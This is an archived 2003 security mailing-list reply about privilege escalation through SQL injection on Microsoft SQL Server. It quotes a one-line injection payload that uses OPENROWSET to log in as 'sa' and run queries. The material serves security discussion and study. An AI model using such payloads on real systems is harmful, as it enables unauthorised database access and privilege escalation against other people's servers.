Re: Brute forcing a M$ SQL Server password through SQL Injection

From: David Litchfield (mnemonix@globalnet.co.uk)
Date: Thu Feb 20 2003 - 02:22:06 EST

• Next message: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
• Previous message: Sanjiv K Agarwala: "RE: NetMeeting and H.323"
• In reply to: Roman Medina: "Brute forcing a M$ SQL Server password through SQL Injection"
• Next in thread: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
• Reply: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
• Reply: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

>.....The goal is to elevate priviledges.

>How would you achieve this? ...

You need to take a look at OPENROWSET:

' UNION SELECT * FROM
OPENROWSET('SQLOLEDB','localhost';'sa';'testpass','SELECT @@version')--

Adhoc queries need to be enabled, though.

HTH,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/

----------------------------------------------------------------------------

Do you know the base address of the Global Offset Table (GOT) on a Solaris 8
box?
CORE IMPACT does.
http://www.securityfocus.com/core

• Next message: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
• Previous message: Sanjiv K Agarwala: "RE: NetMeeting and H.323"
• In reply to: Roman Medina: "Brute forcing a M$ SQL Server password through SQL Injection"
• Next in thread: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
• Reply: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
• Reply: Roman Medina: "Re: Brute forcing a M$ SQL Server password through SQL Injection"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:28 EDT